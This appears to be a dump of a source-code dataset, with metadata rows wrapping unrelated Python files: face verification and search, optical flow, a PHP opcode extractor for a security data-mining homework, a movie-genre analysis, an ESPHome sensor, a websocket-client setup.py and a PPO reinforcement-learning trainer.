imgs[0] = get_image(full_path, draw=False)
imgs[1] = get_image(full_path, flip=True, draw=False)
imgs = imgs.to(device)
with torch.no_grad():
output = model(imgs)
feature = output[0].cpu().numpy() + output[1].cpu().numpy()
x = feature / np.linalg.norm(feature)
return x
def face_verify():
start = time.time()
ensure_folder(STATIC_DIR)
ensure_folder(UPLOAD_DIR)
file1 = request.files['file1']
fn_1 = secure_filename(file1.filename)
full_path_1 = os.path.join(UPLOAD_DIR, fn_1)
file1.save(full_path_1)
resize(full_path_1)
file2 = request.files['file2']
fn_2 = secure_filename(file2.filename)
full_path_2 = os.path.join(UPLOAD_DIR, fn_2)
file2.save(full_path_2)
resize(full_path_2)
prob, is_same = compare(full_path_1, full_path_2)
elapsed = time.time() - start
return is_same, prob, elapsed, fn_1, fn_2
def face_detect(full_path):
start = time.time()
img = Image.open(full_path).convert('RGB')
bboxes, landmarks = detect_faces(img)
num_faces = len(bboxes)
if num_faces > 0:
img = cv.imread(full_path)
draw_bboxes(img, bboxes, landmarks)
cv.imwrite(full_path, img)
elapsed = time.time() - start
return num_faces, float(elapsed), bboxes, landmarks
def face_search():
start = time.time()
ensure_folder(STATIC_DIR)
ensure_folder(UPLOAD_DIR)
file = request.files['file']
filename = secure_filename(file.filename)
filename = filename.lower()
if filename in ['jpg', 'jpeg', 'png', 'gif']:
filename = str(random.randint(0, 101)) + '.' + filename
file_upload = os.path.join(UPLOAD_DIR, filename)
file.save(file_upload)
resize(file_upload)
logger.info('file_upload: ' + file_upload)
name, prob, file_star = search(file_upload)
elapsed = time.time() - start
return name, prob, file_star, file_upload, float(elapsed)
def face_feature():
start = time.time()
ensure_folder(STATIC_DIR)
ensure_folder(UPLOAD_DIR)
file = request.files['file']
filename = secure_filename(file.filename)
filename = filename.lower()
if filename in ['jpg', 'jpeg', 'png', 'gif']:
filename = str(random.randint(0, 101)) + '.' + filename
file_upload = os.path.join(UPLOAD_DIR, filename)
file.save(file_upload)
resize(file_upload)
logger.info('file_upload: ' + file_upload)
feature = get_feature(file_upload)
elapsed = time.time() - start
return feature, file_upload, float(elapsed)
def extract(filename, folder_path):
zip_ref = zipfile.ZipFile(filename, 'r')
zip_ref.extractall(folder_path)
zip_ref.close()
logger.info('files extracted to: {}'.format(folder_path))
try:
os.remove(filename)
except OSError:
pass
class ArcFaceDataset(Dataset):
def __init__(self, files, folder_path):
self.files = files
self.folder_path = folder_path
def __getitem__(self, i):
filepath = self.files[i]
filepath = os.path.join(self.folder_path, filepath)
img_0, img_1 = get_image_batch(filepath, draw=False)
return img_0, img_1
def __len__(self):
return len(self.files)
def face_feature_batch(full_path=''):
start = time.time()
folder_path = 'static/batch'
rand = random.randint(1000, 9999)
subdir = datetime.datetime.now().strftime('%Y-%m-%d_%H-%M-%S')
subdir = '{}_{}'.format(subdir, rand)
folder_path = os.path.join(folder_path, subdir)
shutil.rmtree(folder_path, ignore_errors=True)
if full_path.lower().endswith('.zip'):
extract(full_path, folder_path)
files = [f for f in os.listdir(folder_path)]
logger.info('file count: {}, start filtering...'.format(len(files)))
filtered = []
for filename in tqdm(files):
full_path = os.path.join(folder_path, filename)
try:
img = Image.open(full_path).convert('RGB')
bounding_boxes, landmarks = detect_faces(img)
if len(bounding_boxes) > 0:
filtered.append(filename)
except ValueError:
pass
except OSError:
pass
files = filtered
file_count = len(files)
logger.info('filtered file count: {}, start processing...'.format(len(files)))
batch_size = 256
feature_dict = dict()
with torch.no_grad():
for start_idx in tqdm(range(0, file_count, batch_size)):
end_idx = min(file_count, start_idx + batch_size)
length = end_idx - start_idx
imgs_0 = torch.zeros([length, 3, 112, 112], dtype=torch.float, device=device)
imgs_1 = torch.zeros([length, 3, 112, 112], dtype=torch.float, device=device)
for idx in range(0, length):
i = start_idx + idx
filepath = files[i]
filepath = os.path.join(folder_path, filepath)
imgs_0[idx], imgs_1[idx] = get_image_batch(filepath, draw=False)
features_0 = model(imgs_0.to(device)).cpu().numpy()
features_1 = model(imgs_1.to(device)).cpu().numpy()
for idx in range(0, length):
i = start_idx + idx
feature = features_0[idx] + features_1[idx]
feature = feature / np.linalg.norm(feature)
feature_dict[files[i]] = feature.tolist()
# logger.info('images processed')
elapsed = time.time() - start
if file_count > 0:
elapsed_per_image = elapsed / file_count
times.update(elapsed_per_image, file_count)
shutil.rmtree(folder_path, ignore_errors=True)
logger.info('batch({}) done: {:.4f}({:.4f}) seconds per image.'.format(len(files), times.val, times.avg))
return feature_dict, elapsed
if __name__ == "__main__":
compare('id_card.jpg', 'photo_1.jpg')
compare('id_card.jpg', 'photo_2.jpg')
compare('id_card.jpg', 'photo_3.jpg')
compare('id_card.jpg', 'photo_4.jpg')
| 10,954 | 2 | 543 |
64f5c80b80caea8f767009f87333b4de2d60eb43 | 2,344 | py | Python | reip/blocks/video/effects.py | reip-project/reip-pipelines | c6a8341e963b73f6fd08d63513876590e5af3d62 | [
"BSD-3-Clause-Clear"
] | null | null | null | reip/blocks/video/effects.py | reip-project/reip-pipelines | c6a8341e963b73f6fd08d63513876590e5af3d62 | [
"BSD-3-Clause-Clear"
] | null | null | null | reip/blocks/video/effects.py | reip-project/reip-pipelines | c6a8341e963b73f6fd08d63513876590e5af3d62 | [
"BSD-3-Clause-Clear"
] | null | null | null | import numpy as np
import cv2
import reip
class OpticalFlow(reip.Block):
'''
https://opencv-python-tutroals.readthedocs.io/en/latest/py_tutorials/py_video/py_lucas_kanade/py_lucas_kanade.html#dense-optical-flow-in-opencv
'''
hsv = None
_prev = None
# pyr_scale=0.5, levels=3, winsize=15, iterations=3,
# poly_n=5, poly_sigma=1.2, flags=0 | 37.206349 | 147 | 0.605375 | import numpy as np
import cv2
import reip
class OpticalFlow(reip.Block):
'''
https://opencv-python-tutroals.readthedocs.io/en/latest/py_tutorials/py_video/py_lucas_kanade/py_lucas_kanade.html#dense-optical-flow-in-opencv
'''
hsv = None
_prev = None
# pyr_scale=0.5, levels=3, winsize=15, iterations=3,
# poly_n=5, poly_sigma=1.2, flags=0
def __init__(self, pyr_scale=0.5, levels=3, winsize=15, iterations=3,
poly_n=5, poly_sigma=1.2, flags=0, resize=(256, 256), draw_mag_scale=10, draw=None, **kw):
self.pyr_scale = pyr_scale
self.levels = levels
self.winsize = winsize
self.iterations = iterations
self.poly_n = poly_n
self.poly_sigma = poly_sigma
self.flags = flags
self.resize = resize
self._should_draw = draw
self.draw_mag_scale = draw_mag_scale
super().__init__(n_outputs=2, **kw)
def init(self):
self.should_draw = bool(self.sinks[1].readers) if self._should_draw is None else self._should_draw
self.log.debug(f'will draw: {self.should_draw}')
def process(self, frame, meta):
original = frame
if self.resize:
frame = cv2.resize(frame, self.resize)
current = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY).astype('uint8')
if self.hsv is None:
self.hsv = np.zeros_like(frame)
self.hsv[..., 1] = 255
self._prev = current
return
flow = cv2.calcOpticalFlowFarneback(
self._prev, current, None, self.pyr_scale, self.levels, self.winsize,
self.iterations, self.poly_n, self.poly_sigma, self.flags)
self._prev = current
flow = cv2.cartToPolar(flow[..., 0], flow[..., 1])
return [flow, self.draw(original, flow) if self.should_draw else None], {}
def draw(self, im, flow, mix=0.5):
mag, ang = flow
self.hsv[..., 0] = ang * 180 / np.pi / 2
# self.hsv[..., 2] = cv2.normalize(mag, None, 0, 255, cv2.NORM_MINMAX)
self.hsv[..., 2] = np.clip(mag*self.draw_mag_scale, 0, 255)
flow = cv2.cvtColor(self.hsv, cv2.COLOR_HSV2BGR)
if im.shape != flow.shape:
flow = cv2.resize(flow, im.shape[:2][::-1])
im = im * (1-mix) + flow * mix
return (im/255).astype('float32') | 1,868 | 0 | 107 |
ea34fd7e600804241350bd0344bbe8d8d9dd67f3 | 1,409 | py | Python | Homework/2019/Task7/4/Code/filter_opcode.py | ohhuola/Data-Mining-for-Cybersecurity | 7c04b2519810970227777fc1a1a29bb87d47a41e | [
"MIT"
] | null | null | null | Homework/2019/Task7/4/Code/filter_opcode.py | ohhuola/Data-Mining-for-Cybersecurity | 7c04b2519810970227777fc1a1a29bb87d47a41e | [
"MIT"
] | null | null | null | Homework/2019/Task7/4/Code/filter_opcode.py | ohhuola/Data-Mining-for-Cybersecurity | 7c04b2519810970227777fc1a1a29bb87d47a41e | [
"MIT"
] | null | null | null | import re
import subprocess
import os
from tqdm import tqdm
| 29.354167 | 97 | 0.53868 | import re
import subprocess
import os
from tqdm import tqdm
def php_to_opcode(phpfilename):
try:
# ๆง่กๆๅฎ็ๅฝไปค๏ผๅฆๆๆง่ก็ถๆ็ ไธบ0ๅ่ฟๅๅฝไปคๆง่ก็ปๆ๏ผๅฆๅๆๅบๅผๅธธใ
output = subprocess.check_output(
['php', '-dvld.active=1', '-dvld.execute=0', phpfilename], stderr=subprocess.STDOUT)
output = str(output, encoding='utf-8')
tokens = re.findall(r'\s(\b[A-Z_]+\b)\s', output)
t = " ".join(tokens)
t = t[6:]
return t
except:
print(
"\n[-]Warning: something happend when execute vld to get opcode:" + str(phpfilename))
return " "
def trans(path):
if os.path.exists(path) == False:
print('\n[-]Warning: path does not exist, do nothing')
return [], 0, 0
result = []
i = 0
j = 0
if os.path.isfile(path):
result.append(php_to_opcode(path))
# is a dir
elif os.path.isdir(path):
for dirpath, dirnames, filenames in os.walk(path):
for single_file in tqdm(filenames, desc=dirpath, ncols=100):
if '.php' in single_file:
fullpath = os.path.join(dirpath, single_file)
single_result = php_to_opcode(fullpath)
if single_result == " ":
j += 1
continue
result.append(single_result)
i += 1
return result, i, j
| 1,367 | 0 | 46 |
7ae8c7f7b52099998030d4155daa298e682c086a | 630 | py | Python | Assignment Solution/Module5-master/Module5_CaseStudy1_Q2_Ans.py | krdhakal/Edureka-HW-Solutions-of-Data-Science-for-Python-Certification | 2332839d25cca3ee8036d6dda7360a3b31824d6b | [
"MIT"
] | null | null | null | Assignment Solution/Module5-master/Module5_CaseStudy1_Q2_Ans.py | krdhakal/Edureka-HW-Solutions-of-Data-Science-for-Python-Certification | 2332839d25cca3ee8036d6dda7360a3b31824d6b | [
"MIT"
] | null | null | null | Assignment Solution/Module5-master/Module5_CaseStudy1_Q2_Ans.py | krdhakal/Edureka-HW-Solutions-of-Data-Science-for-Python-Certification | 2332839d25cca3ee8036d6dda7360a3b31824d6b | [
"MIT"
] | null | null | null | # Find the genre in which there has been the greatest number of movie releases
import pandas as pd
import numpy as np
dataset=pd.read_csv('c:\\temp\\HollywoodMovies.csv')
selected_data=dataset.loc[:,['WorldGross','Genre']]
df=pd.DataFrame(selected_data)
df_notnull_genre=df[df.Genre.notnull()]
df_notnull_worldgross=df_notnull_genre[df_notnull_genre.WorldGross.notnull()]
df_final= df_notnull_worldgross
Series_genre = df_final['WorldGross'].groupby(df_final['Genre']).sum()
df_new=pd.DataFrame(Series_genre)
genre=df_new.sort_values(by='WorldGross', ascending=False).head(10) #finding top 10 genre movies released
print genre
| 39.375 | 106 | 0.803175 | # Find the genre in which there has been the greatest number of movie releases
import pandas as pd
import numpy as np
dataset=pd.read_csv('c:\\temp\\HollywoodMovies.csv')
selected_data=dataset.loc[:,['WorldGross','Genre']]
df=pd.DataFrame(selected_data)
df_notnull_genre=df[df.Genre.notnull()]
df_notnull_worldgross=df_notnull_genre[df_notnull_genre.WorldGross.notnull()]
df_final= df_notnull_worldgross
Series_genre = df_final['WorldGross'].groupby(df_final['Genre']).sum()
df_new=pd.DataFrame(Series_genre)
genre=df_new.sort_values(by='WorldGross', ascending=False).head(10) #finding top 10 genre movies released
print genre
| 0 | 0 | 0 |
a943368dd77b94ada6edbbab0c76bd8593bd383e | 634 | py | Python | esphome/components/homeassistant/binary_sensor/__init__.py | OttoWinter/esphomeyaml | 6a85259e4d6d1b0a0f819688b8e555efcb99ecb0 | [
"MIT"
] | 249 | 2018-04-07T12:04:11.000Z | 2019-01-25T01:11:34.000Z | esphome/components/homeassistant/binary_sensor/__init__.py | OttoWinter/esphomeyaml | 6a85259e4d6d1b0a0f819688b8e555efcb99ecb0 | [
"MIT"
] | 243 | 2018-04-11T16:37:11.000Z | 2019-01-25T16:50:37.000Z | esphome/components/homeassistant/binary_sensor/__init__.py | OttoWinter/esphomeyaml | 6a85259e4d6d1b0a0f819688b8e555efcb99ecb0 | [
"MIT"
] | 40 | 2018-04-10T05:50:14.000Z | 2019-01-25T15:20:36.000Z | import esphome.codegen as cg
from esphome.components import binary_sensor
from .. import (
HOME_ASSISTANT_IMPORT_SCHEMA,
homeassistant_ns,
setup_home_assistant_entity,
)
DEPENDENCIES = ["api"]
HomeassistantBinarySensor = homeassistant_ns.class_(
"HomeassistantBinarySensor", binary_sensor.BinarySensor, cg.Component
)
CONFIG_SCHEMA = binary_sensor.binary_sensor_schema(HomeassistantBinarySensor).extend(
HOME_ASSISTANT_IMPORT_SCHEMA
)
| 25.36 | 85 | 0.801262 | import esphome.codegen as cg
from esphome.components import binary_sensor
from .. import (
HOME_ASSISTANT_IMPORT_SCHEMA,
homeassistant_ns,
setup_home_assistant_entity,
)
DEPENDENCIES = ["api"]
HomeassistantBinarySensor = homeassistant_ns.class_(
"HomeassistantBinarySensor", binary_sensor.BinarySensor, cg.Component
)
CONFIG_SCHEMA = binary_sensor.binary_sensor_schema(HomeassistantBinarySensor).extend(
HOME_ASSISTANT_IMPORT_SCHEMA
)
async def to_code(config):
var = await binary_sensor.new_binary_sensor(config)
await cg.register_component(var, config)
setup_home_assistant_entity(var, config)
| 151 | 0 | 23 |
89089996ae8b20945ecd282a5d4e36d1c88f9623 | 658 | py | Python | Programming/python/cookbook/n_base_conversion.py | kwangjunechoi7/TIL | 99403791eb77fd9190d7d6f60ade67bb48122b33 | [
"MIT"
] | null | null | null | Programming/python/cookbook/n_base_conversion.py | kwangjunechoi7/TIL | 99403791eb77fd9190d7d6f60ade67bb48122b33 | [
"MIT"
] | null | null | null | Programming/python/cookbook/n_base_conversion.py | kwangjunechoi7/TIL | 99403791eb77fd9190d7d6f60ade67bb48122b33 | [
"MIT"
] | null | null | null | # -*-coding:utf-8-*-
"""
์ง๋ฒ ๋ณํ recursive ์๊ณ ๋ฆฌ์ฆ
2 <= n <= 16๊น์ง ๊ฐ๋ฅ
"""
"""
def test(n,t):
answer = ''
while t//n >= 1:
re = t%n
t = t//n
answer = str(re) + answer
print(answer)
if t < n:
answer = str(t) + answer
return int(answer)
"""
"""
# ์ง๋ฒ ๋ณํ ํจ์ ์ฌ๋์
def convert_2(t, n):
s = 'ABCDEF'
a = ''
while t:
if t%n > 9:
a = s[t%n -10] + a
else:
a = str(t%n) + a
t = t//n
return a
""" | 16.04878 | 36 | 0.410334 | # -*-coding:utf-8-*-
"""
์ง๋ฒ ๋ณํ recursive ์๊ณ ๋ฆฌ์ฆ
2 <= n <= 16๊น์ง ๊ฐ๋ฅ
"""
def convert(n,t):
T = "0123456789ABCDEF"
q,r = divmod(n, t)
if q ==0:
return T[r]
else:
return convert(q, t) + T[r]
"""
def test(n,t):
answer = ''
while t//n >= 1:
re = t%n
t = t//n
answer = str(re) + answer
print(answer)
if t < n:
answer = str(t) + answer
return int(answer)
"""
"""
# ์ง๋ฒ ๋ณํ ํจ์ ์ฌ๋์
def convert_2(t, n):
s = 'ABCDEF'
a = ''
while t:
if t%n > 9:
a = s[t%n -10] + a
else:
a = str(t%n) + a
t = t//n
return a
""" | 126 | 0 | 23 |
893bf952793b1d79a10262685f8eb26e6c8e37fa | 391 | py | Python | src/opera/parser/tosca/v_1_3/policy_definition.py | sstanovnik/xopera-opera | 06031d37268913c6ba6dbc30ec6b4acb3a17dc5a | [
"Apache-2.0"
] | null | null | null | src/opera/parser/tosca/v_1_3/policy_definition.py | sstanovnik/xopera-opera | 06031d37268913c6ba6dbc30ec6b4acb3a17dc5a | [
"Apache-2.0"
] | null | null | null | src/opera/parser/tosca/v_1_3/policy_definition.py | sstanovnik/xopera-opera | 06031d37268913c6ba6dbc30ec6b4acb3a17dc5a | [
"Apache-2.0"
] | null | null | null | from ..entity import Entity
from ..map import Map
from ..reference import Reference
from ..string import String
from ..void import Void
| 23 | 44 | 0.657289 | from ..entity import Entity
from ..map import Map
from ..reference import Reference
from ..string import String
from ..void import Void
class PolicyDefinition(Entity):
ATTRS = dict(
type=Reference("policy_types"),
description=String,
metadata=Map(String),
properties=Map(Void),
# TODO(@tadeboro): targets, triggers
)
REQUIRED = {"type"}
| 0 | 231 | 23 |
c33f07b92a9ea6c9b5d80e72c591cec5aeaf2a35 | 2,591 | py | Python | setup.py | Robert-96/websocket-client | fd56fd35d2a933745814afd23253a33d71306bb9 | [
"Apache-2.0"
] | 1 | 2022-03-25T09:03:23.000Z | 2022-03-25T09:03:23.000Z | setup.py | Robert-96/websocket-client | fd56fd35d2a933745814afd23253a33d71306bb9 | [
"Apache-2.0"
] | null | null | null | setup.py | Robert-96/websocket-client | fd56fd35d2a933745814afd23253a33d71306bb9 | [
"Apache-2.0"
] | null | null | null | import sys
import pkg_resources
from setuptools import setup, find_packages
"""
setup.py
websocket - WebSocket client library for Python
Copyright 2022 engn33r
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
VERSION = "1.3.1"
install_requires = []
tests_require = []
setup(
name="websocket-client",
version=VERSION,
description="WebSocket client for Python with low level API options",
long_description=open("README.md").read(),
long_description_content_type='text/markdown',
author="liris",
author_email="liris.pp@gmail.com",
license="Apache-2.0",
url="https://github.com/websocket-client/websocket-client.git",
download_url='https://github.com/websocket-client/websocket-client/releases',
python_requires='>=3.7',
extras_require={
"test": ["websockets"],
"optional": ["python-socks", "wsaccel"],
"docs": ["Sphinx >= 3.4", "sphinx_rtd_theme >= 0.5"],
},
classifiers=[
"Development Status :: 4 - Beta",
"License :: OSI Approved :: Apache Software License",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.7",
"Programming Language :: Python :: 3.8",
"Programming Language :: Python :: 3.9",
"Programming Language :: Python :: 3.10",
"Operating System :: MacOS :: MacOS X",
"Operating System :: POSIX",
"Operating System :: Microsoft :: Windows",
"Topic :: Internet",
"Topic :: Software Development :: Libraries :: Python Modules",
"Intended Audience :: Developers",
],
project_urls={
'Documentation': 'https://websocket-client.readthedocs.io/',
'Source': 'https://github.com/websocket-client/websocket-client/',
},
keywords='websockets client',
entry_points={
'console_scripts': [
'wsdump=websocket._wsdump:main',
],
},
install_requires=install_requires,
packages=find_packages(),
package_data={
'websocket.tests': ['data/*.txt']
},
tests_require=tests_require,
test_suite="websocket.tests"
)
| 32.797468 | 81 | 0.661521 | import sys
import pkg_resources
from setuptools import setup, find_packages
"""
setup.py
websocket - WebSocket client library for Python
Copyright 2022 engn33r
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
VERSION = "1.3.1"
install_requires = []
tests_require = []
setup(
name="websocket-client",
version=VERSION,
description="WebSocket client for Python with low level API options",
long_description=open("README.md").read(),
long_description_content_type='text/markdown',
author="liris",
author_email="liris.pp@gmail.com",
license="Apache-2.0",
url="https://github.com/websocket-client/websocket-client.git",
download_url='https://github.com/websocket-client/websocket-client/releases',
python_requires='>=3.7',
extras_require={
"test": ["websockets"],
"optional": ["python-socks", "wsaccel"],
"docs": ["Sphinx >= 3.4", "sphinx_rtd_theme >= 0.5"],
},
classifiers=[
"Development Status :: 4 - Beta",
"License :: OSI Approved :: Apache Software License",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.7",
"Programming Language :: Python :: 3.8",
"Programming Language :: Python :: 3.9",
"Programming Language :: Python :: 3.10",
"Operating System :: MacOS :: MacOS X",
"Operating System :: POSIX",
"Operating System :: Microsoft :: Windows",
"Topic :: Internet",
"Topic :: Software Development :: Libraries :: Python Modules",
"Intended Audience :: Developers",
],
project_urls={
'Documentation': 'https://websocket-client.readthedocs.io/',
'Source': 'https://github.com/websocket-client/websocket-client/',
},
keywords='websockets client',
entry_points={
'console_scripts': [
'wsdump=websocket._wsdump:main',
],
},
install_requires=install_requires,
packages=find_packages(),
package_data={
'websocket.tests': ['data/*.txt']
},
tests_require=tests_require,
test_suite="websocket.tests"
)
| 0 | 0 | 0 |
c656d81b7ac6d0b7d7e2fea232113d472dda5096 | 10,112 | py | Python | on_policy/algorithms/ppo.py | marsXyr/RL_Pytorch | cc80bfb442c45c8e87849a7d0a1fb8bc837448a5 | [
"MIT"
] | null | null | null | on_policy/algorithms/ppo.py | marsXyr/RL_Pytorch | cc80bfb442c45c8e87849a7d0a1fb8bc837448a5 | [
"MIT"
] | null | null | null | on_policy/algorithms/ppo.py | marsXyr/RL_Pytorch | cc80bfb442c45c8e87849a7d0a1fb8bc837448a5 | [
"MIT"
] | null | null | null | import numpy as np
import argparse, gym, time, os
import os.path as osp
import torch
import torch.nn as nn
import torch.optim as optim
from on_policy.utils import core
from on_policy.utils.model import ActorCritic
from on_policy.utils.replay_buffer import ReplayBuffer
from utils.logx import EpochLogger
from utils.run_utils import setup_logger_kwargs
from utils.mpi_tools import mpi_fork, num_procs, mpi_avg, proc_id
if __name__ == '__main__':
parser = argparse.ArgumentParser()
""" env """
parser.add_argument('--env', type=str, default='HalfCheetah-v2')
parser.add_argument('--epochs', type=int, default=50)
parser.add_argument('--steps_per_epoch', type=int, default=4000)
parser.add_argument('--max_ep_len', type=int, default=1000)
parser.add_argument('--train_pi_iters', type=int,default=80)
parser.add_argument('--train_v_iters', type=int, default=80)
parser.add_argument('--save_freq', type=int, default=5)
""" algorithm """
parser.add_argument('--gamma', type=float, default=0.99)
parser.add_argument('--lam', type=float, default=0.95)
parser.add_argument('--clip_ratio', type=float, default=0.2)
parser.add_argument('--target_kl', type=float, default=0.01)
parser.add_argument('--actor_lr', type=float, default=1e-4)
parser.add_argument('--critic_lr', type=float, default=1e-3)
""" others """
parser.add_argument('--seed', '-s', type=int, default=0)
parser.add_argument('--exp_name', type=str, default='ppo')
parser.add_argument('--cpu', type=int, default=2)
args = parser.parse_args()
# run parallel code with mpi
mpi_fork(args.cpu)
logger_kwargs = setup_logger_kwargs(args.exp_name, args.seed)
# Save model path
fpath = osp.join(logger_kwargs['output_dir'], 'models')
ppo = PPO()
ppo.run()
| 42.666667 | 122 | 0.601563 | import numpy as np
import argparse, gym, time, os
import os.path as osp
import torch
import torch.nn as nn
import torch.optim as optim
from on_policy.utils import core
from on_policy.utils.model import ActorCritic
from on_policy.utils.replay_buffer import ReplayBuffer
from utils.logx import EpochLogger
from utils.run_utils import setup_logger_kwargs
from utils.mpi_tools import mpi_fork, num_procs, mpi_avg, proc_id
class PPO:
def __init__(self):
# train env, which is used in train process
self.env = gym.make(args.env).unwrapped
# env information
self.state_space = self.env.observation_space
self.action_space = self.env.action_space
self.state_dim = self.state_space.shape[0]
self._init_parameters()
self._init_nets()
self.replay_buffer = ReplayBuffer(self.local_steps_per_epoch, self.state_space.shape, self.action_space.shape,
self.gamma, self.lam)
# set random seed
seed = args.seed + 10000 * proc_id()
self.env.seed(seed)
np.random.seed(seed)
torch.manual_seed(seed)
def _init_parameters(self):
self.epochs = args.epochs
self.steps_per_epoch = args.steps_per_epoch
self.local_steps_per_epoch = int(self.steps_per_epoch / num_procs())
self.max_ep_len = args.max_ep_len
self.save_freq = args.save_freq
self.actor_lr = args.actor_lr
self.critic_lr = args.critic_lr
self.train_pi_iters = args.train_pi_iters
self.train_v_iters = args.train_v_iters
self.gamma = args.gamma
self.lam = args.lam
self.clip_ratio = args.clip_ratio
self.target_kl = args.target_kl
# Save the parameters setting to config file
self.logger = EpochLogger(**logger_kwargs)
self.logger.save_config(locals())
def _init_nets(self):
# initial actor and critic
self.actor_critic = ActorCritic(self.state_dim, self.action_space)
# initial optim
self.actor_optim = optim.Adam(self.actor_critic.policy.parameters(), lr=self.actor_lr)
self.critic_optim = optim.Adam(self.actor_critic.value_function.parameters(), lr=self.critic_lr)
# initial loss
self.loss = nn.MSELoss()
core.sync_all_params(self.actor_critic.parameters())
def update(self):
states, actions, advantages, returns, logp_olds = [core.to_tensor(x) for x in self.replay_buffer.get()]
# Training policy
_, logp, _, _, _ = self.actor_critic.policy(states, actions)
# a sample estimate for entropy
entropy = (-logp).mean()
ratio = (logp - logp_olds).exp()
min_adv = torch.where(advantages > 0, (1 + self.clip_ratio) * advantages, (1 - self.clip_ratio) * advantages)
pi_l_old = -(torch.min(ratio * advantages, min_adv)).mean()
for i in range(self.train_pi_iters):
# Output from policy function graph
_, logp, _, _, _ = self.actor_critic.policy(states, actions)
# PPO policy objective
ratio = (logp - logp_olds).exp()
min_adv = torch.where(advantages > 0, (1 + self.clip_ratio) * advantages, (1 - self.clip_ratio) * advantages)
pi_loss = -(torch.min(ratio * advantages, min_adv)).mean()
# Policy update
self.actor_optim.zero_grad()
pi_loss.backward()
core.average_gradients(self.actor_optim.param_groups)
self.actor_optim.step()
# _, logp, _, _, _ = self.actor_critic.policy(states, actions)
kl = (logp_olds - logp).mean()
kl = mpi_avg(kl.item())
if kl > 1.5 * self.target_kl:
self.logger.log('Early stopping at step %d due to reaching max kl.' % i)
break
self.logger.store(StopIter=i)
# Training value function
v = self.actor_critic.value_function(states)
v_l_old = self.loss(v, returns)
for _ in range(self.train_v_iters):
# Output from value function graph
v = self.actor_critic.value_function(states)
# PPO value function objective
v_loss = self.loss(v, returns)
# Value function gradient step
self.critic_optim.zero_grad()
v_loss.backward()
core.average_gradients(self.critic_optim.param_groups)
self.critic_optim.step()
# Log changes from update
_, logp, _, _, _, v = self.actor_critic(states, actions)
ratio = (logp - logp_olds).exp()
min_adv = torch.where(advantages > 0, (1 + self.clip_ratio) * advantages,
(1 - self.clip_ratio) * advantages)
pi_l_new = -(torch.min(ratio * advantages, min_adv)).mean()
v_l_new = self.loss(v, returns)
kl = (logp_olds - logp).mean() # a sample estimate for KL-divergence
clipped = (ratio > (1 + self.clip_ratio)) | (ratio < (1 - self.clip_ratio))
cf = (clipped.float()).mean()
self.logger.store(
LossPi=pi_l_old,
LossV=v_l_old,
KL=kl,
Entropy=entropy,
ClipFrac=cf,
DeltaLossPi=(pi_l_new - pi_l_old),
DeltaLossV=(v_l_new - v_l_old))
def run(self):
# Create dir for model saving
if not osp.exists(fpath): os.mkdir(fpath)
start_time = time.time()
state, reward, done, ep_return, ep_len = self.env.reset(), 0, False, 0, 0
# Main loop: collect experience in env and update/log each epoch
for epoch in range(self.epochs):
self.actor_critic.eval()
for t in range(self.local_steps_per_epoch):
action, _, logp, _, _, v = self.actor_critic(core.to_tensor(state.reshape(1, -1)))
# save and log
self.replay_buffer.store(state, action.detach().numpy(), reward, v.item(), logp.detach().numpy())
self.logger.store(VVals=v)
state, reward, done, _ = self.env.step(action.detach().numpy()[0])
ep_return += reward
ep_len += 1
terminal = done or (ep_len == self.max_ep_len)
if terminal or (t == self.local_steps_per_epoch - 1):
if not terminal:
print('Warning: trajectory cut off by epoch at %d steps.' % ep_len)
# if trajectory didn't reach terminal state, bootstrap value target
last_val = reward if done else \
self.actor_critic.value_function(core.to_tensor(state.reshape(1, -1))).item()
self.replay_buffer.finish_path(last_val)
if terminal:
# only save EpRet / EpLen if trajectory finished
self.logger.store(EpRet=ep_return, EpLen=ep_len)
state, reward, done, ep_return, ep_len = self.env.reset(), 0, False, 0, 0
# Perform PPO update!
self.actor_critic.train()
self.update()
# Save model
if (epoch % self.save_freq == 0) or (epoch == self.epochs - 1):
self.logger.save_state({'env': self.env}, None)
self.save_model(epoch)
# Log info about epoch
self.logger.log_tabular('Epoch', epoch)
self.logger.log_tabular('EpRet', with_min_and_max=True)
self.logger.log_tabular('EpLen', average_only=True)
self.logger.log_tabular('VVals', with_min_and_max=True)
self.logger.log_tabular('TotalEnvInteracts', (epoch + 1) * self.steps_per_epoch)
self.logger.log_tabular('LossPi', average_only=True)
self.logger.log_tabular('LossV', average_only=True)
self.logger.log_tabular('DeltaLossPi', average_only=True)
self.logger.log_tabular('DeltaLossV', average_only=True)
self.logger.log_tabular('Entropy', average_only=True)
self.logger.log_tabular('KL', average_only=True)
self.logger.log_tabular('ClipFrac', average_only=True)
self.logger.log_tabular('StopIter', average_only=True)
self.logger.log_tabular('Time', time.time() - start_time)
self.logger.dump_tabular()
def save_model(self, epoch):
torch.save(self.actor_critic, osp.join(fpath, 'actor_critic'+str(epoch)+'.pkl'))
if __name__ == '__main__':
parser = argparse.ArgumentParser()
""" env """
parser.add_argument('--env', type=str, default='HalfCheetah-v2')
parser.add_argument('--epochs', type=int, default=50)
parser.add_argument('--steps_per_epoch', type=int, default=4000)
parser.add_argument('--max_ep_len', type=int, default=1000)
parser.add_argument('--train_pi_iters', type=int,default=80)
parser.add_argument('--train_v_iters', type=int, default=80)
parser.add_argument('--save_freq', type=int, default=5)
""" algorithm """
parser.add_argument('--gamma', type=float, default=0.99)
parser.add_argument('--lam', type=float, default=0.95)
parser.add_argument('--clip_ratio', type=float, default=0.2)
parser.add_argument('--target_kl', type=float, default=0.01)
parser.add_argument('--actor_lr', type=float, default=1e-4)
parser.add_argument('--critic_lr', type=float, default=1e-3)
""" others """
parser.add_argument('--seed', '-s', type=int, default=0)
parser.add_argument('--exp_name', type=str, default='ppo')
parser.add_argument('--cpu', type=int, default=2)
args = parser.parse_args()
# run parallel code with mpi
mpi_fork(args.cpu)
